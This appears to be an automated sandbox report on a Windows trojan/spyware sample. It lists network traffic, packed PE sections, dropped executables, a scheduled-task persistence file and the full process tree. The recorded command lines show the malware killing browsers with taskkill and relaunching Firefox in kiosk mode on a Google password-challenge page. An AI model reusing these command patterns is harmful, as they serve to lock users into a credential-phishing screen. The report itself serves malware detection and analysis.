Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50021 version: TLS 1.2

System Summary

Source: 760934cb92.exe, 0000000D.00000000.3024294213.0000000000932000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b846f0eb-7
Source: 760934cb92.exe, 0000000D.00000000.3024294213.0000000000932000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_923826cd-a
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name:
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: .idata
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: .idata
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 58ce8f976c.exe.8.dr Static PE information: section name:
Source: 58ce8f976c.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .rsrc
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .idata
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name:
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: .idata
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: .idata
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name:
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: .idata
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: .idata
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFB3F 3_2_00CBFB3F
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFC9E 3_2_00CBFC9E
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFCB2 3_2_00CBFCB2
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFC06 3_2_00CBFC06
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Code function: 10_3_00F8DA12 10_3_00F8DA12
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe BF8C8B70BC76645BA18AB3D6A37B6139AC2D298F058C519AD36D458C4EBC5607
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Source: file.exe, 00000000.00000003.2318941071.00000000061B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9977836010971787
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: skotes.exe.4.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9977836010971787
Source: 58ce8f976c.exe.8.dr Static PE information: Section: ZLIB complexity 0.9977836010971787
Source: random[1].exe0.8.dr Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
Source: 7451ae0b11.exe.8.dr Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@82/38@94/14
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7YW0363WEKP7ULOI0QRA.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2186543484.0000000005C0A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186465399.0000000005C17000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174475307.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174129641.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2895905550.0000000005974000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911883577.0000000005963000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911735199.000000000596E000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056287581.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3050315426.0000000006008000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3069419629.0000000005FFA000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3069032273.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 47%
Source: 7YW0363WEKP7ULOI0QRA.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 58ce8f976c.exe String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signatur
Source: 58ce8f976c.exe String found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signature-v
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe "C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe "C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe"
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2308 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa78a0b3-bca7-4b7b-8021-d7d875974ef5} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e3b86f310 socket
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe "C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 4172 -prefMapHandle 4168 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e2b9126-91e2-41af-b164-fbbe6f838f36} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e4cd8c210 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002538001\num.exe "C:\Users\user\AppData\Local\Temp\1002538001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe "C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002538001\num.exe "C:\Users\user\AppData\Local\Temp\1002538001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe "C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe "C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe "C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe "C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe"
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe "C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe"
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe "C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe"
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe "C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe"
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe "C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2308 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa78a0b3-bca7-4b7b-8021-d7d875974ef5} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e3b86f310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
